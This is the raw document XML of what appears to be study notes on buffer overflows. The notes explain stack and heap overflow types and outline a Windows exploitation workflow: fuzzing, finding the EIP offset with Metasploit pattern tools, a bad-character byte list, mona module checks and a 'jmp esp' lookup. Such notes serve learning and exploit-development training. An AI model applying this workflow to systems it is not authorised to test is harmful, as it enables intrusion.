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widowControl/>
        <w:spacing w:lineRule="atLeast" w:line="15" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="-400" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>buffer_overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="200"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>buffer-overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:eastAsia="Helvetica" w:cs="Helvetica" w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:b/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="13"/>
            <w:szCs w:val="13"/>
            <w:u w:val="none"/>
            <w:bdr w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            <w14:textFill>
              <w14:solidFill>
                <w14:schemeClr w14:val="tx1"/>
              </w14:solidFill>
            </w14:textFill>
          </w:rPr>
          <w:t>View on GitHub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>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30"/>
          <w:szCs w:val="30"/>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30"/>
          <w:szCs w:val="30"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>buffer overflow</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4799965" cy="251968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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4799965" cy="2519680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>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[TOC]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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24"/>
          <w:szCs w:val="2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24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>types</w:t>
      </w:r>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stack based</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A technically inclined user may exploit stack-based buffer overflows to manipulate the program to their advantage in one of several ways:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="14" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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By overwriting a local variable that is located near the vulnerable buffer on the stack, in order to change the behavior of the program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="14" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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By overwriting the return address in a </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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stack frame</w:t>
        </w:r>
      </w:hyperlink>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 Once the function returns, execution will resume at the return address as specified by the attacker - usually a user-input filled buffer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="14" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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By overwriting a function pointer[</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:smallCaps w:val="false"/>
          <w:caps w:val="false"/>
          <w:sz w:val="16"/>
          <w:spacing w:val="0"/>
          <w:i w:val="false"/>
          <w:szCs w:val="16"/>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:instrText> HYPERLINK "https://en.wikipedia.org/wiki/Buffer_overflow" \l "cite_note-1"</w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:smallCaps w:val="false"/>
          <w:caps w:val="false"/>
          <w:sz w:val="16"/>
          <w:spacing w:val="0"/>
          <w:i w:val="false"/>
          <w:szCs w:val="16"/>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>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1]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:smallCaps w:val="false"/>
          <w:caps w:val="false"/>
          <w:sz w:val="16"/>
          <w:spacing w:val="0"/>
          <w:i w:val="false"/>
          <w:szCs w:val="16"/>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w: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 or </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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exception handler</w:t>
        </w:r>
      </w:hyperlink>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 which is subsequently executed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="atLeast" w:line="14" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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By overwriting a local variable (or pointer) of a different stack frame, which will be used by the function which owns that frame later</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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="305435" cy="305435"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="2" name="Picture 2" descr="IMG_257"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"/>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o:allowincell="f" style="position:absolute;margin-left:0pt;margin-top:-24.05pt;width:23.95pt;height:23.95pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" type="_x0000_t75">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>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heap based</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A buffer overflow occurring in the heap data area is referred to as a heap overflow and is exploitable in a manner different from that of stack-based overflows. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data. Exploitation is performed by corrupting this data in specific ways to cause the application to overwrite internal structures such as linked list pointers. The canonical heap overflow technique overwrites dynamic memory allocation linkage (such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>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malloc</w:t>
        </w:r>
      </w:hyperlink>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 meta data) and uses the resulting pointer exchange to overwrite a program function pointer</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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="305435" cy="305435"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="3" name="Picture 3" descr="IMG_258"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"/>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="shape_0" ID="Picture 3" stroked="f" o:allowincell="f" style="position:absolute;margin-left:0pt;margin-top:-24.05pt;width:23.95pt;height:23.95pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" type="_x0000_t75">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>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24"/>
          <w:szCs w:val="2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24"/>
          <w:szCs w:val="24"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>exploitation</w:t>
      </w:r>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windows buffer overflow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>discovering vulnerablity</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we discover a application is vulnerable to buffer overflow by fuzzing the application with a fuzzer</w:t>
      </w:r>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introduction to immunity debuuger</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>adding the application to imunnity debugger</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>fuzzing the application</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a fuzzer fuzzes the application with in an random incremental order such that the application stops when it detects a crash or timeout from the application we interact</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refer boofuzz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>replicating the crash</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we replicate crash by sending the appliation with value at which it crashed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>controlling the EIP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>LOCATING EIP BY CREATING UNIQUE PATTERN</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msf-pattern_create -h</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msf-pattern_create -l length of buffer</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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>LOCATING THE OFFSET ADDRESS OF EIP</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msf-pattern_offset -h</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msf-pattern_offset -l lengthofbuffer -q stringfromeip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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4"/>
          <w:szCs w:val="1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4"/>
          <w:szCs w:val="14"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>locating space for shell code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>CHECKING FOR BAD CHARCTERS</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"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"</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"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"</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"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"</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"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"</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"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"</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"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"</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"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"</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"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"</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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="305435" cy="305435"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="4" name="Picture 4" descr="IMG_259"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"/>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="shape_0" ID="Picture 4" stroked="f" o:allowincell="f" style="position:absolute;margin-left:0pt;margin-top:-24.05pt;width:23.95pt;height:23.95pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" type="_x0000_t75">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>REDIRECTING THE EXECUTION FLOW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>FINDING THE RETURN ADDRESS</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 introduction to mona</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!mona</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>IDENTIFYING THE MODULE WITH OUT ASLR,DEP,SEH</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:keepNext w:val="false"/>
        <w:keepLines w:val="false"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="50"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Console" w:cs="Lucida Console" w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>NASM SHELL</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mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="305435" cy="305435"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="5" name="Picture 5" descr="IMG_260"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"/>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="shape_0" ID="Picture 5" stroked="f" o:allowincell="f" style="position:absolute;margin-left:0pt;margin-top:-24.05pt;width:23.95pt;height:23.95pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" type="_x0000_t75">
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="#3465a4" weight="9360" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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msf-nasm_shell</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i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>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nasm&gt;jmp esp</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i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
